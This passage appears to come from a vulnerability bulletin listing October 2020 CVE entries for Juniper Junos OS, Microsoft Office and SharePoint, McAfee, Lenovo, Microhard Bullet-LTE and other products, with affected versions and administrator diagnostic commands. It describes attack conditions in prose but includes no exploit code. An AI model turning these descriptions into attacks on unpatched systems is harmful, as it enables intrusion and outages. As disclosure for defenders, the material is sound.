On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is memory leak caused by this issue:
    user@device> show system virtual-memory | match "pfe_ipc|kmem"
    pfe_ipc 147 5K - 164352 16,32,64,8192 <-- increasing
    vm.kmem_map_free: 127246336 <-- decreasing
    pfe_ipc 0 0K - 18598 32,8192
    vm.kmem_map_free: 134582272
This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3. 2020-10-16 not yet calculated CVE-2020-1683
CONFIRM
juniper_networks — junos_os_evolved
 
The system console configuration option ‘log-out-on-disconnect’ in Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO. 2020-10-16 not yet calculated CVE-2020-1666
CONFIRM
juniper_networks — junos_os_evolved
 
Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but continuous receipt of the malformed NDP packets could lead to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1681
CONFIRM
juniper_networks — mist_cloud_ui
 
When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1676
CONFIRM
juniper_networks — multiple_junos_os_devices

On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issue and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch that get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1687
CONFIRM
juniper_networks — multiple_junos_os_devices
 
On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1689
CONFIRM
juniper_networks — multiple_junos_os_devices
 
An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects the following versions of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200, vSRX, NFX150: 15.1X49 versions prior to 15.1X49-D220; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3. This issue does not affect Junos OS 19.3 or any subsequent version. 2020-10-16 not yet calculated CVE-2020-1682
CONFIRM
juniper_networks — mx_series_and_ex9200_series_devices
 
On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take effect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2. 2020-10-16 not yet calculated CVE-2020-1665
CONFIRM
MISC
juniper_networks — mx_series_devices
 
On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1680
CONFIRM
juniper_networks — mx_series_devices
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing “URL Filtering service”, may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1660
CONFIRM
juniper_networks — nfx350_devices
 
The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1669
CONFIRM
juniper_networks — ptx/qfx_series_devices
 
On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronizes the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when the KRT queue becomes stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the output of the following command to check whether the KRT queue is stuck:
user@device > show krt state
…
Number of async queue entries: 65007 <— this value keeps on increasing.
When this issue occurs, the following messages might appear in /var/log/messages:
DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2
DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd
This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1679
CONFIRM
juniper_networks — srx_series_and_nfx_series_devices
 
On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1688
MISC
CONFIRM
MISC
MISC
MISC
juniper_networks — srx_series_devices
 
On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases. 2020-10-16 not yet calculated CVE-2020-1657
CONFIRM
juniper_networks — srx_series_devices
 
On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2. 2020-10-16 not yet calculated CVE-2020-1684
CONFIRM
junit — junit4
 
In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix-like systems, the system’s temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. This vulnerability impacts you if the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder, and the JUnit tests execute in an environment where the OS has other untrusted users. Because certain JDK file system APIs were only added in JDK 1.7, this fix is dependent upon the version of the JDK you are using. For Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. For Java 1.6 and lower users: no patch is available, you must use the workaround below. If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. For more information, including an example of vulnerable code, see the referenced GitHub Security Advisory. 2020-10-12 not yet calculated CVE-2020-15250
MISC
MISC
MISC
CONFIRM
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
lcds — laquis_scada
 
An attacker who convinces a valid user to open a specially crafted project file could execute code under the privileges of the application due to an out-of-bounds read vulnerability in LAquis SCADA (versions prior to 4.3.1.870). 2020-10-14 not yet calculated CVE-2020-25188
MISC
MISC
lenovo — cloud_networking_operating_system
 
An internal security review has identified an unauthenticated remote code execution vulnerability in Cloud Networking Operating System (CNOS)’ optional REST API management interface. This interface is disabled by default and not vulnerable unless enabled. When enabled, it is only vulnerable where attached to a VRF and as allowed by defined ACLs. Lenovo strongly recommends upgrading to a non-vulnerable CNOS release. Where not possible, Lenovo recommends disabling the REST API management interface or restricting access to the management VRF and further limiting access to authorized management stations via ACL. 2020-10-14 not yet calculated CVE-2020-8349
MISC
lenovo — hardwarescan_plugin
 
A DLL search path vulnerability was reported in the Lenovo HardwareScan Plugin for the Lenovo Vantage hardware scan feature prior to version 1.0.46.11 that could allow escalation of privilege. 2020-10-14 not yet calculated CVE-2020-8345
MISC
lenovo — multiple_devices
 
A potential vulnerability in the SMI callback function used in the legacy BIOS mode USB drivers in some legacy Lenovo and IBM System x servers may allow arbitrary code execution. Servers operating in UEFI mode are not affected. 2020-10-14 not yet calculated CVE-2020-8332
MISC
lenovo — thinkpad_stack_wireless_router
 
An authentication bypass vulnerability was reported in Lenovo ThinkPad Stack Wireless Router firmware version 1.1.3.4 that could allow escalation of privilege. 2020-10-14 not yet calculated CVE-2020-8350
MISC
libarchive — libarchive
 
Heap-based buffer overflow in archive_string_append_from_wcs() (archive_string.c) in libarchive-3.4.1dev allows remote attackers to cause a denial of service (out-of-bounds write in heap memory resulting into a crash) via a crafted archive file. NOTE: this only affects users who downloaded the development code from GitHub. Users of the product’s official releases are unaffected. 2020-10-15 not yet calculated CVE-2020-21674
MISC
MISC
libass — libass
 
In libass 0.14.0, the `ass_outline_construct`’s call to `outline_stroke` causes a signed integer overflow. 2020-10-16 not yet calculated CVE-2020-26682
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a. 2020-10-16 not yet calculated CVE-2020-27194
MISC
MISC
mark_text — mark_text
 
Mutation XSS exists in Mark Text through 0.16.2 that leads to Remote Code Execution. NOTE: this might be considered a duplicate of CVE-2020-26870; however, it can also be considered an issue in the design of the “source code mode” feature, which parses HTML even though HTML support is not one of the primary advertised roles of the product. 2020-10-16 not yet calculated CVE-2020-27176
MISC
mcafee — active_response
 
Improperly implemented security check in McAfee Active Response (MAR) prior to 2.4.4 may allow local administrators to execute malicious code via stopping a core Windows service, leaving McAfee core trust component in an inconsistent state, resulting in MAR failing open rather than closed. 2020-10-15 not yet calculated CVE-2020-7326
CONFIRM
mcafee — application_and_change_control
 
Improper privilege assignment vulnerability in the installer McAfee Application and Change Control (MACC) prior to 8.3.2 allows local administrators to change or update the configuration settings via a carefully constructed MSI configured to mimic the genuine installer. This version adds further controls for installation/uninstallation of software. 2020-10-15 not yet calculated CVE-2020-7334
CONFIRM
mcafee — epolicy_orchistrator
 
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via parameter values for “syncPointList” not being correctly sanitised. 2020-10-14 not yet calculated CVE-2020-7318
MISC
mcafee — epolicy_orchistrator
 
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via parameter values for “syncPointList” not being correctly sanitised. 2020-10-14 not yet calculated CVE-2020-7317
MISC
mcafee — mvision_endpoint_detection_and_response_client
 
Improperly implemented security check in McAfee MVISION Endpoint Detection and Response Client (MVEDR) prior to 3.2.0 may allow local administrators to execute malicious code via stopping a core Windows service, leaving McAfee core trust component in an inconsistent state, resulting in MVEDR failing open rather than closed. 2020-10-15 not yet calculated CVE-2020-7327
CONFIRM
mcafee — total_protection
 
Privilege Escalation vulnerability in McAfee Total Protection (MTP) trial prior to 4.0.176.1 allows local users to schedule tasks which call malicious software to execute with elevated privileges via editing of environment variables. 2020-10-14 not yet calculated CVE-2020-7330
CONFIRM
microhard — bullet-lte
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of authentication headers. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10596. 2020-10-13 not yet calculated CVE-2020-17407
N/A
microhard — bullet-lte
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of the ping parameter provided to tools.sh. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10595. 2020-10-13 not yet calculated CVE-2020-17406
N/A
microsoft — .net_framework
 
An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka ‘.NET Framework Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16937
MISC
microsoft — 3d_viewer
 
A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory, aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16918. 2020-10-16 not yet calculated CVE-2020-17003
MISC
microsoft — 3d_viewer_and_365_apps_for_enterprise
 
A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory, aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-17003. 2020-10-16 not yet calculated CVE-2020-16918
MISC
microsoft — azure_functions
 
An elevation of privilege vulnerability exists in the way Azure Functions validate access keys. An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization. This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions, aka ‘Azure Functions Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16904
MISC
microsoft — dynamics_365
 
A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16956. 2020-10-16 not yet calculated CVE-2020-16978
MISC
microsoft — dynamics_365
 
An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka ‘Dynamics 365 Commerce Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16943
MISC
microsoft — dynamics_365
 
A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16978. 2020-10-16 not yet calculated CVE-2020-16956
MISC
microsoft — excel
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932. 2020-10-16 not yet calculated CVE-2020-16930
MISC
microsoft — excel
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932. 2020-10-16 not yet calculated CVE-2020-16931
MISC
microsoft — excel
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931. 2020-10-16 not yet calculated CVE-2020-16932
MISC
microsoft — excel
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932. 2020-10-16 not yet calculated CVE-2020-16929
MISC
microsoft — exchange
 
An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka ‘Microsoft Exchange Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16969
MISC
microsoft — network_watcher_agent
 
An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka ‘Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16995
MISC
microsoft — office

An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955. 2020-10-16 not yet calculated CVE-2020-16928
MISC
microsoft — office
 
An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955. 2020-10-16 not yet calculated CVE-2020-16934
MISC
microsoft — office
 
An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934. 2020-10-16 not yet calculated CVE-2020-16955
MISC
microsoft — office
 
A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka ‘Microsoft Office Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16954
MISC
microsoft — office_access_connectivity_engine
 
A remote code execution vulnerability exists when the Microsoft Office Access Connectivity Engine improperly handles objects in memory, aka ‘Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16957
MISC
microsoft — outlook
 
A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16947
MISC
microsoft — outlook
 
A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Denial of Service Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16949
MISC
microsoft — powershellget
 
A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka ‘PowerShellGet Module WDAC Security Feature Bypass Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16886
MISC
microsoft — sharepoint_server

An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953. 2020-10-16 not yet calculated CVE-2020-16950
MISC
microsoft — sharepoint_server
 
A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16946. 2020-10-16 not yet calculated CVE-2020-16945
MISC
microsoft — sharepoint_server
 
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16952. 2020-10-16 not yet calculated CVE-2020-16951
MISC
microsoft — sharepoint_server
 
An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953. 2020-10-16 not yet calculated CVE-2020-16948
MISC
microsoft — sharepoint_server
 
A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16945. 2020-10-16 not yet calculated CVE-2020-16946
MISC
microsoft — sharepoint_server
 
An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950. 2020-10-16 not yet calculated CVE-2020-16953
MISC
microsoft — sharepoint_server
 
This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka ‘Microsoft SharePoint Reflective XSS Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16944
MISC
microsoft — sharepoint_server
 
An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 not yet calculated CVE-2020-16942
MISC
microsoft — sharepoint_server
 
An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 not yet calculated CVE-2020-16941
MISC
microsoft — sharepoint_server
 
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951. 2020-10-16 not yet calculated CVE-2020-16952
MISC
microsoft — visual_studio_code
 
